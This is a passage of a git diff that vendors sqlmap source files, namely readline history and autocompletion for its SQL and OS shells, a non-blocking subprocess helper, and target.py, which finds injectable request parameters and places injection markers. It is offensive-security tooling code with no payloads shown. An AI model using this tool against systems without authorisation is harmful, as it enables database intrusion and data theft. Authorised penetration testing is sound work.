"w+"): + pass + except: + pass + + readline.set_history_length(MAX_HISTORY_LENGTH) + try: + readline.write_history_file(historyPath) + except IOError as ex: + warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except KeyboardInterrupt: + pass + +def loadHistory(completion=None): + if not readlineAvailable(): + return + + clearHistory() + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + if os.path.exists(historyPath): + try: + readline.read_history_file(historyPath) + except IOError as ex: + warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, getSafeExString(ex)) + logger.warning(warnMsg) + except UnicodeError: + if IS_WIN: + warnMsg = "there was a problem loading the history file '%s'. " % historyPath + warnMsg += "More info can be found at 'https://github.com/pyreadline/pyreadline/issues/30'" + logger.warning(warnMsg) + +def autoCompletion(completion=None, os=None, commands=None): + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.OS: + if os == OS.WINDOWS: + # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands + completer = CompleterNG({ + "attrib": None, "copy": None, "del": None, + "dir": None, "echo": None, "fc": None, + "label": None, "md": None, "mem": None, + "move": None, "net": None, "netstat -na": None, + "tree": None, "truename": None, "type": None, + "ver": None, "vol": None, "xcopy": None, + }) + + else: + # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands + completer = CompleterNG({ + "cat": None, "chmod": None, "chown": None, + "cp": None, "cut": None, "date": None, "df": None, + "diff": None, "du": None, "echo": None, "env": None, + "file": None, "find": None, "free": None, "grep": None, + "id": None, "ifconfig": None, "ls": None, "mkdir": None, + "mv": None, "netstat": None, "pwd": None, "rm": None, + "uname": None, "whoami": None, + }) + + readline.set_completer(completer.complete) + readline.parse_and_bind("tab: complete") + + elif commands: + completer = CompleterNG(dict(((_, None) for _ in commands))) + readline.set_completer_delims(' ') + readline.set_completer(completer.complete) + readline.parse_and_bind("tab: complete") + + loadHistory(completion) + atexit.register(saveHistory, completion) diff --git a/src/sqlmap-master/lib/core/subprocessng.py b/src/sqlmap-master/lib/core/subprocessng.py new file mode 100644 index 0000000..db2c18b --- /dev/null +++ b/src/sqlmap-master/lib/core/subprocessng.py @@ -0,0 +1,202 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import errno +import os +import subprocess +import time + +from lib.core.compat import buffer +from lib.core.convert import getBytes +from lib.core.settings import IS_WIN + +if IS_WIN: + try: + from win32file import ReadFile, WriteFile + from win32pipe import PeekNamedPipe + except ImportError: + pass + import msvcrt +else: + import select + import fcntl + +def blockingReadFromFD(fd): + # Quick twist around original Twisted function + # Blocking read from a non-blocking file descriptor + output = b"" + + while True: + try: + output += os.read(fd, 8192) + except (OSError, IOError) as ioe: + if ioe.args[0] in (errno.EAGAIN, errno.EINTR): + # Uncomment the following line if the process seems to + # take a huge amount of cpu time + # time.sleep(0.01) + continue + else: + raise + break + + if not output: + raise EOFError("fd %s has been closed." % fd) + + return output + +def blockingWriteToFD(fd, data): + # Another quick twist + while True: + try: + data_length = len(data) + wrote_data = os.write(fd, data) + except (OSError, IOError) as io: + if io.errno in (errno.EAGAIN, errno.EINTR): + continue + else: + raise + + if wrote_data < data_length: + blockingWriteToFD(fd, data[wrote_data:]) + + break + +# the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/ +class Popen(subprocess.Popen): + def recv(self, maxsize=None): + return self._recv('stdout', maxsize) + + def recv_err(self, maxsize=None): + return self._recv('stderr', maxsize) + + def send_recv(self, input='', maxsize=None): + return self.send(input), self.recv(maxsize), self.recv_err(maxsize) + + def get_conn_maxsize(self, which, maxsize): + if maxsize is None: + maxsize = 1024 + elif maxsize < 1: + maxsize = 1 + return getattr(self, which), maxsize + + def _close(self, which): + getattr(self, which).close() + setattr(self, which, None) + + if IS_WIN: + def send(self, input): + if not self.stdin: + return None + + try: + x = msvcrt.get_osfhandle(self.stdin.fileno()) + (_, written) = WriteFile(x, input) + except ValueError: + return self._close('stdin') + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): + return self._close('stdin') + raise + + return written + + def _recv(self, which, maxsize): + conn, maxsize = self.get_conn_maxsize(which, maxsize) + if conn is None: + return None + + try: + x = msvcrt.get_osfhandle(conn.fileno()) + (read, nAvail, _) = PeekNamedPipe(x, 0) + if maxsize < nAvail: + nAvail = maxsize + if nAvail > 0: + (_, read) = ReadFile(x, nAvail, None) + except (ValueError, NameError): + return self._close(which) + except Exception as ex: + if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN): + return self._close(which) + raise + + if self.universal_newlines: + read = self._translate_newlines(read) + return read + else: + def send(self, input): + if not self.stdin: + return None + + if not select.select([], [self.stdin], [], 0)[1]: + return 0 + + try: + written = os.write(self.stdin.fileno(), input) + except OSError as ex: + if ex.args[0] == errno.EPIPE: # broken pipe + return self._close('stdin') + raise + + return written + + def _recv(self, which, maxsize): + conn, maxsize = self.get_conn_maxsize(which, maxsize) + if conn is None: + return None + + flags = fcntl.fcntl(conn, fcntl.F_GETFL) + if not conn.closed: + fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK) + + try: + if not select.select([conn], [], [], 0)[0]: + return '' + + r = conn.read(maxsize) + if not r: + return self._close(which) + + if self.universal_newlines: + r = self._translate_newlines(r) + return r + finally: + if not conn.closed: + fcntl.fcntl(conn, fcntl.F_SETFL, flags) + +def recv_some(p, t=.1, e=1, tr=5, stderr=0): + if tr < 1: + tr = 1 + x = time.time() + t + y = [] + r = '' + if stderr: + pr = p.recv_err + else: + pr = p.recv + while time.time() < x or r: + r = pr() + if r is None: + break + elif r: + y.append(r) + else: + time.sleep(max((x - time.time()) / tr, 0)) + return b''.join(y) + +def send_all(p, data): + if not data: + return + + data = getBytes(data) + + while len(data): + sent = p.send(data) + if not isinstance(sent, int): + break + data = buffer(data[sent:]) diff --git a/src/sqlmap-master/lib/core/target.py b/src/sqlmap-master/lib/core/target.py new file mode 100644 index 0000000..cc3ccd2 --- /dev/null +++ b/src/sqlmap-master/lib/core/target.py @@ -0,0 +1,773 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import functools +import os +import re +import subprocess +import sys +import tempfile +import time + +from lib.core.common import Backend +from lib.core.common import getSafeExString +from lib.core.common import hashDBRetrieve +from lib.core.common import intersect +from lib.core.common import isNumPosStrValue +from lib.core.common import normalizeUnicode +from lib.core.common import openFile +from lib.core.common import paramToDict +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.common import removePostHintPrefix +from lib.core.common import resetCookieJar +from lib.core.common import safeStringFormat +from lib.core.common import unArrayizeValue +from lib.core.common import urldecode +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import mergedOptions +from lib.core.data import paths +from lib.core.datatype import InjectionDict +from lib.core.dicts import DBMS_DICT +from lib.core.dump import dumper +from lib.core.enums import HASHDB_KEYS +from lib.core.enums import HTTP_HEADER +from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.enums import PLACE +from lib.core.enums import POST_HINT +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapSystemException +from lib.core.exception import SqlmapUserQuitException +from lib.core.option import _setAuthCred +from lib.core.option import _setDBMS +from lib.core.option import _setKnowledgeBaseAttributes +from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import DEFAULT_GET_POST_DELIMITER +from lib.core.settings import HOST_ALIASES +from lib.core.settings import INJECT_HERE_REGEX +from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX +from lib.core.settings import JSON_RECOGNITION_REGEX +from lib.core.settings import MULTIPART_RECOGNITION_REGEX +from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS +from lib.core.settings import REFERER_ALIASES +from lib.core.settings import RESTORE_MERGED_OPTIONS +from lib.core.settings import RESULTS_FILE_FORMAT +from lib.core.settings import SESSION_SQLITE_FILE +from lib.core.settings import SUPPORTED_DBMS +from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import UNKNOWN_DBMS_VERSION +from lib.core.settings import URI_INJECTABLE_REGEX +from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import XML_RECOGNITION_REGEX +from lib.core.threads import getCurrentThreadData +from lib.utils.hashdb import HashDB +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import urllib as _urllib + +def _setRequestParams(): + """ + Check and set the parameters and perform checks on 'data' option for + HTTP method POST. + """ + + if conf.direct: + conf.parameters[None] = "direct connection" + return + + hintNames = [] + testableParameters = False + + # Perform checks on GET parameters + if conf.parameters.get(PLACE.GET): + parameters = conf.parameters[PLACE.GET] + paramDict = paramToDict(PLACE.GET, parameters) + + if paramDict: + conf.paramDict[PLACE.GET] = paramDict + testableParameters = True + + # Perform checks on POST parameters + if conf.method == HTTPMETHOD.POST and conf.data is None: + logger.warning("detected empty POST body") + conf.data = "" + + if conf.data is not None: + conf.method = conf.method or HTTPMETHOD.POST + + def process(match, repl): + retVal = match.group(0) + + if not (conf.testParameter and match.group("name") not in (removePostHintPrefix(_) for _ in conf.testParameter)) and match.group("name") == match.group("name").strip('\\'): + retVal = repl + while True: + _ = re.search(r"\\g<([^>]+)>", retVal) + if _: + try: + retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1))) + except IndexError: + break + else: + break + if kb.customInjectionMark in retVal: + hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name").strip('"\'') if kb.postHint == POST_HINT.JSON_LIKE else match.group("name"))) + + return retVal + + if kb.processUserMarks is None and kb.customInjectionMark in conf.data: + message = "custom injection marker ('%s') found in %s " % (kb.customInjectionMark, conf.method) + message += "body. Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processUserMarks = choice == 'Y' + + if kb.processUserMarks: + kb.testOnlyCustom = True + + if re.search(JSON_RECOGNITION_REGEX, conf.data): + message = "JSON data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.JSON + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*".*?)"(?%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + for match in re.finditer(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data): + if not (conf.testParameter and match.group("name") not in conf.testParameter): + _ = match.group(2) + if kb.customInjectionMark not in _: # Note: only for unprocessed (simple) forms - i.e. non-associative arrays (e.g. [1,2,3]) + _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _) + _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _) + conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) + + elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): + message = "JSON-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.JSON_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + if '"' in conf.data: + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data) + else: + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data) + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data) + + elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): + message = "Array-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.ARRAY_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data) + + elif re.search(XML_RECOGNITION_REGEX, conf.data): + message = "SOAP/XML data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % kb.customInjectionMark), conf.data) + + elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): + message = "Multipart-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.MULTIPART + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(?si)(Content-Disposition:[^\n]+\s+name=\"(?P[^\"]+)\"(?:[^f|^b]|f(?!ilename=)|b(?!oundary=))*?)((%s)--)" % ("\r\n" if "\r\n" in conf.data else '\n'), + functools.partial(process, repl=r"\g<1>%s\g<3>" % kb.customInjectionMark), conf.data) + + if not kb.postHint: + if kb.customInjectionMark in conf.data: # later processed + pass + else: + place = PLACE.POST + + conf.parameters[place] = conf.data + paramDict = paramToDict(place, conf.data) + + if paramDict: + conf.paramDict[place] = paramDict + testableParameters = True + else: + if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found + conf.parameters[PLACE.POST] = conf.data + + kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks + + if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): + warnMsg = "you've provided target URL without any GET " + warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " + warnMsg += "and without providing any POST parameters " + warnMsg += "through option '--data'" + logger.warning(warnMsg) + + message = "do you want to try URI injections " + message += "in the target URL itself? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + conf.url = "%s%s" % (conf.url, kb.customInjectionMark) + kb.processUserMarks = True + + for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): + if place == PLACE.CUSTOM_HEADER and any((conf.forms, conf.crawlDepth)): + continue + + _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" + if kb.customInjectionMark in _: + if kb.processUserMarks is None: + lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} + message = "custom injection marker ('%s') found in option " % kb.customInjectionMark + message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processUserMarks = choice == 'Y' + + if kb.processUserMarks: + kb.testOnlyCustom = True + + if "=%s" % kb.customInjectionMark in _: + warnMsg = "it seems that you've provided empty parameter value(s) " + warnMsg += "for testing. Please, always use only valid parameter values " + warnMsg += "so sqlmap could be able to run properly" + logger.warning(warnMsg) + + if not kb.processUserMarks: + if place == PLACE.URI: + query = _urllib.parse.urlsplit(value).query + if query: + parameters = conf.parameters[PLACE.GET] = query + paramDict = paramToDict(PLACE.GET, parameters) + + if paramDict: + conf.url = conf.url.split('?')[0] + conf.paramDict[PLACE.GET] = paramDict + testableParameters = True + elif place == PLACE.CUSTOM_POST: + conf.parameters[PLACE.POST] = conf.data + paramDict = paramToDict(PLACE.POST, conf.data) + + if paramDict: + conf.paramDict[PLACE.POST] = paramDict + testableParameters = True + + else: + if place == PLACE.URI: + value = conf.url = conf.url.replace('+', "%20") # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5123 + + conf.parameters[place] = value + conf.paramDict[place] = OrderedDict() + + if place == PLACE.CUSTOM_HEADER: + for index in xrange(len(conf.httpHeaders)): + header, value = conf.httpHeaders[index] + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value): + parts = value.split(kb.customInjectionMark) + for i in xrange(len(parts) - 1): + conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))) + conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, "")) + else: + parts = value.split(kb.customInjectionMark) + + for i in xrange(len(parts) - 1): + name = None + if kb.postHint: + for ending, _ in hintNames: + if parts[i].endswith(ending): + name = "%s %s" % (kb.postHint, _) + break + if name is None: + name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark) + conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))) + + if place == PLACE.URI and PLACE.GET in conf.paramDict: + del conf.paramDict[PLACE.GET] + elif place == PLACE.CUSTOM_POST and PLACE.POST in conf.paramDict: + del conf.paramDict[PLACE.POST] + + testableParameters = True + + if kb.processUserMarks: + for item in ("url", "data", "agent", "referer", "cookie"): + if conf.get(item): + conf[item] = conf[item].replace(kb.customInjectionMark, "") + + # Perform checks on Cookie parameters + if conf.cookie: + conf.parameters[PLACE.COOKIE] = conf.cookie + paramDict = paramToDict(PLACE.COOKIE, conf.cookie) + + if paramDict: + conf.paramDict[PLACE.COOKIE] = paramDict + testableParameters = True + + # Perform checks on header values + if conf.httpHeaders: + for httpHeader, headerValue in list(conf.httpHeaders): + # Url encoding of the header values should be avoided + # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value + + if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper(): + conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) + + condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) + + if condition: + conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} + testableParameters = True + + elif httpHeader.upper() == HTTP_HEADER.REFERER.upper(): + conf.parameters[PLACE.REFERER] = urldecode(headerValue) + + condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) + + if condition: + conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} + testableParameters = True + + elif httpHeader.upper() == HTTP_HEADER.HOST.upper(): + conf.parameters[PLACE.HOST] = urldecode(headerValue) + + condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) + + if condition: + conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} + testableParameters = True + + else: + condition = intersect(conf.testParameter, [httpHeader], True) + + if condition: + conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) + conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} + conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders] + testableParameters = True + + if not conf.parameters: + errMsg = "you did not provide any GET, POST and Cookie " + errMsg += "parameter, neither an User-Agent, Referer or Host header value" + raise SqlmapGenericException(errMsg) + + elif not testableParameters: + errMsg = "all testable parameters you provided are not present " + errMsg += "within the given request data" + raise SqlmapGenericException(errMsg) + + if conf.csrfToken: + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}), conf.paramDict.get(PLACE.COOKIE, {}))) and not re.search(r"\b%s\b" % conf.csrfToken, conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}) and not all(re.search(conf.csrfToken, _, re.I) for _ in conf.paramDict.get(PLACE.URI, {}).values()): + errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original + errMsg += "found in provided GET, POST, Cookie or header values" + raise SqlmapGenericException(errMsg) + else: + for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE): + if conf.csrfToken: + break + + for parameter in conf.paramDict.get(place, {}): + if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): + message = "%sparameter '%s' appears to hold anti-CSRF token. " % ("%s " % place if place != parameter else "", parameter) + message += "Do you want sqlmap to automatically update it in further requests? [y/N] " + + if readInput(message, default='N', boolean=True): + class _(six.text_type): + pass + conf.csrfToken = _(re.escape(getUnicode(parameter))) + conf.csrfToken._original = getUnicode(parameter) + break + +def _setHashDB(): + """ + Check and set the HashDB SQLite file for query resume functionality. + """ + + if not conf.hashDBFile: + conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE) + + if conf.flushSession: + if os.path.exists(conf.hashDBFile): + if conf.hashDB: + conf.hashDB.closeAll() + + try: + os.remove(conf.hashDBFile) + logger.info("flushing session file") + except OSError as ex: + errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex) + raise SqlmapFilePathException(errMsg) + + conf.hashDB = HashDB(conf.hashDBFile) + +def _resumeHashDBValues(): + """ + Resume stored data values from HashDB + """ + + kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths + kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables + kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns + kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars + kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings + kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable + + kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) + if isNumPosStrValue(kb.errorChunkLength): + kb.errorChunkLength = int(kb.errorChunkLength) + else: + kb.errorChunkLength = None + + conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) + + for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: + if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]: + if not conf.technique or intersect(conf.technique, injection.data.keys()): + if intersect(conf.technique, injection.data.keys()): + injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.technique) + if injection not in kb.injections: + kb.injections.append(injection) + kb.vulnHosts.add(conf.hostname) + + _resumeDBMS() + _resumeOS() + +def _resumeDBMS(): + """ + Resume stored DBMS information from HashDB + """ + + value = hashDBRetrieve(HASHDB_KEYS.DBMS) + + if not value: + if conf.offline: + errMsg = "unable to continue in offline mode " + errMsg += "because of lack of usable " + errMsg += "session data" + raise SqlmapNoneDataException(errMsg) + else: + return + + dbms = value.lower() + dbmsVersion = [UNKNOWN_DBMS_VERSION] + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s (.*)" % _, dbms, re.I) + + if _: + dbms = _.group(1).lower() + dbmsVersion = [_.group(2)] + + if conf.dbms: + check = True + for aliases, _, _, _ in DBMS_DICT.values(): + if conf.dbms.lower() in aliases and dbms not in aliases: + check = False + break + + if not check: + message = "you provided '%s' as a back-end DBMS, " % conf.dbms + message += "but from a past scan information on the target URL " + message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms + message += "Do you really want to force the back-end " + message += "DBMS value? [y/N] " + + if not readInput(message, default='N', boolean=True): + conf.dbms = None + Backend.setDbms(dbms) + Backend.setVersionList(dbmsVersion) + else: + infoMsg = "resuming back-end DBMS '%s' " % dbms + logger.info(infoMsg) + + Backend.setDbms(dbms) + Backend.setVersionList(dbmsVersion) + +def _resumeOS(): + """ + Resume stored OS information from HashDB + """ + + value = hashDBRetrieve(HASHDB_KEYS.OS) + + if not value: + return + + os = value + + if os and os != 'None': + infoMsg = "resuming back-end DBMS operating system '%s' " % os + logger.info(infoMsg) + + if conf.os and conf.os.lower() != os.lower(): + message = "you provided '%s' as back-end DBMS operating " % conf.os + message += "system, but from a past scan information on the " + message += "target URL sqlmap assumes the back-end DBMS " + message += "operating system is %s. " % os + message += "Do you really want to force the back-end DBMS " + message += "OS value? [y/N] " + + if not readInput(message, default='N', boolean=True): + conf.os = os + else: + conf.os = os + + Backend.setOs(conf.os) + +def _setResultsFile(): + """ + Create results file for storing results of running in a + multiple target mode. + """ + + if not conf.multipleTargets: + return + + if not conf.resultsFP: + conf.resultsFile = conf.resultsFile or os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower()) + found = os.path.exists(conf.resultsFile) + + try: + conf.resultsFP = openFile(conf.resultsFile, "a", UNICODE_ENCODING, buffering=0) + except (OSError, IOError) as ex: + try: + warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFile, getUnicode(ex)) + handle, conf.resultsFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv") + os.close(handle) + conf.resultsFP = openFile(conf.resultsFile, "w+", UNICODE_ENCODING, buffering=0) + warnMsg += "Using temporary file '%s' instead" % conf.resultsFile + logger.warning(warnMsg) + except IOError as _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) + + if not found: + conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep) + + logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFile) + +def _createFilesDir(): + """ + Create the file directory. + """ + + if not any((conf.fileRead, conf.commonFiles)): + return + + conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname + + if not os.path.isdir(conf.filePath): + try: + os.makedirs(conf.filePath) + except OSError as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") + warnMsg = "unable to create files directory " + warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + conf.filePath = tempDir + +def _createDumpDir(): + """ + Create the dump directory. + """ + + if not conf.dumpTable and not conf.dumpAll and not conf.search: + return + + conf.dumpPath = safeStringFormat(paths.SQLMAP_DUMP_PATH, conf.hostname) + + if not os.path.isdir(conf.dumpPath): + try: + os.makedirs(conf.dumpPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdump") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). " % 